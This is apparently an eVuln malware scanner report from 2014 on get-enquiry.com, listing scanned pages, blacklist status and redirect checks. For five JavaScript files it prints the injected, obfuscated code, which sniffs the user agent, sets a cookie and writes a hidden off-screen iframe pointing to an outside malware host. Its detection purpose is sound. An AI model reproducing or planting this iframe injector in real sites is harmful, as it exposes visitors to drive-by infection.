Malware Scanner report for get-enquiry.com

Malicious/Suspicious/Total urls checked: 5/1/15

6 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "get-enquiry.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=get-enquiry.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://get-enquiry.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://get-enquiry.com/	200 OK Content-Length: 44035 Content-Type: text/html	clean
http://get-enquiry.com/script/yahoo-dom-event.js	200 OK Content-Length: 1820 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox ... 893 bytes are skipped ...decodeURIComponent(matches[1]) : undefined; } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports: Sophos Troj/JSRedir-LH
http://get-enquiry.com/script/yui_helper.js	200 OK Content-Length: 1820 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox ... 893 bytes are skipped ...decodeURIComponent(matches[1]) : undefined; } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports: Sophos Troj/JSRedir-LH
http://get-enquiry.com/engine1/jquery.js	200 OK Content-Length: 1820 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox ... 893 bytes are skipped ...decodeURIComponent(matches[1]) : undefined; } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports: Sophos Troj/JSRedir-LH
http://get-enquiry.com/engine1/wowslider.js	200 OK Content-Length: 1820 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox ... 893 bytes are skipped ...decodeURIComponent(matches[1]) : undefined; } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports: Sophos Troj/JSRedir-LH
http://get-enquiry.com/engine1/script.js	200 OK Content-Length: 1822 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox ... 900 bytes are skipped ...RIComponent(matches[1]) : undefined; } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); */ Antivirus reports: Sophos Troj/JSRedir-LH
http://get-enquiry.com/index.php	200 OK Content-Length: 44035 Content-Type: text/html	clean
http://get-enquiry.com/premium.html	200 OK Content-Length: 40024 Content-Type: text/html	clean
http://get-enquiry.com/get-quote.html	200 OK Content-Length: 45079 Content-Type: text/html	clean
http://get-enquiry.com/login.php	200 OK Content-Length: 19377 Content-Type: text/html	clean
http://get-enquiry.com/register.php	200 OK Content-Length: 66074 Content-Type: text/html	suspicious
Page code contains blacklisted domain: shoppingcart.get-enquiry.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Register-Manufacturer India, Indian Manufacturers Exporters Suppliers Directory, B2C Marketplace</title> <meta name="description" content= ...[4506 bytes skipped]...
http://get-enquiry.com/login.html	404 Not Found Content-Length: 273 Content-Type: text/html	clean
http://get-enquiry.com/test404page.js	404 Not Found Content-Length: 277 Content-Type: text/html	clean
http://get-enquiry.com/directory.html	200 OK Content-Length: 62901 Content-Type: text/html	clean
http://get-enquiry.com/search.php?textfield2=&Submit=Submit	500 Internal Server Error Content-Length: 81161 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: get-enquiry.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 11:06:20 GMT
Server: Apache
Content-Length: 44035
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17

...44035 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: get-enquiry.com
Referer: http://www.google.com/search?q=get-enquiry.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for get-enquiry.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools